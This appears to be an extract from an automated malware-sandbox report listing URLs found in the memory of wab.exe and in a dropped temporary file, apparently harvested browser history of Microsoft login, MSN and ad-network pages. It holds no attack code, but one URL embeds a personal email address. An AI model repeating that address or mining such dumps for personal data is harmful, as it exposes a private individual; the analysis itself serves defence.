              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsign
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242028208.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241654953.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240352351.0000000004DC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241547800.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40252026298.000000000469F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242244213.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251807893.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242980257.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242920703.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241495663.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241402768.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242136692.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242079889.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241811190.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241761167.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242691645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241602092.0000000004DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=l
              Source: wab.exe, 00000009.00000003.40242752420.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfhttps://www.google.com/pagead/drt/uihttps://www.google.com/recaptcha
              Source: wab.exe, 00000009.00000003.40240416792.00000000046B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=13&checkda=1&ct=1632306842&rver=7.0.6730.0&wp=lb
              Source: wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
              Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_hj8oSp9QdNfpZ07Gv-Ue0w2.css
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_qWV3sGhBzcGORhNLatPttg2.css
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_BYvHTGVEjHmqRinYKC8bUQ2.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_fBfIO6PUjtiIRe-Q1r1v
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456def
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90b
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_3l9yQcHwDX6JY4dnECC1pg2.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_rfy0-A_Y4TdpeysEFWwI1w2.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_545f714b012517
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_5b54317b5869f142bd86.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.offi
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeap
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=16521.30551
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1685097289379
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
              Source: wab.exe, 00000009.00000003.40243039699.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241918719.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241974058.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242794079.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242860645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242191086.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242028208.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241654953.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241547800.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40252026298.000000000469F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242244213.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251931887.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251807893.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242980257.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242920703.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240184394.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241495663.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241402768.0000000004DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=1&emailAddress=shahak.shapira%40outlook.com&_=168509
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/bg/4j6j1KaqOj9dOTqNDUFIq-pj8a-_5PTo96X1Pctm55w.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/getconfig/sodar?sv=200&tid=gda&tv=r20210916&st=env
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/managed/js/adsense/m202109200101/show_ads_impl_with_ama
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/show_ads.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=ib.adnxs.com&callback=_gfp_s_&client=ca
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js?domain=www.msn.com&callback=_gfp_s_&client=ca-
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://pki.goog/repository/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=0.5146119884770144
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://s1.adform.net/stoat/626/s1.adform.net/load/v/0.0.209/e/-gABoCBA/i/vCAv.IAAAAAoAA/r:AdConstru
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://sb.scorecardresearch.com/beacon.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://sectigo.com/CPS0
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251675749.000000000469C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242028208.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241654953.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241547800.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242244213.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242980257.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242920703.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241495663.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241402768.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242136692.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242079889.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241811190.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241761167.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40242691645.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241602092.0000000004DC6000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
              Source: wab.exe, 00000009.00000003.40250168695.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249957635.00000000046B3000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254635212.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.g
              Source: wab.exe, 00000009.00000003.40249257458.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.40254681346.00000000046BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tpc.g
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
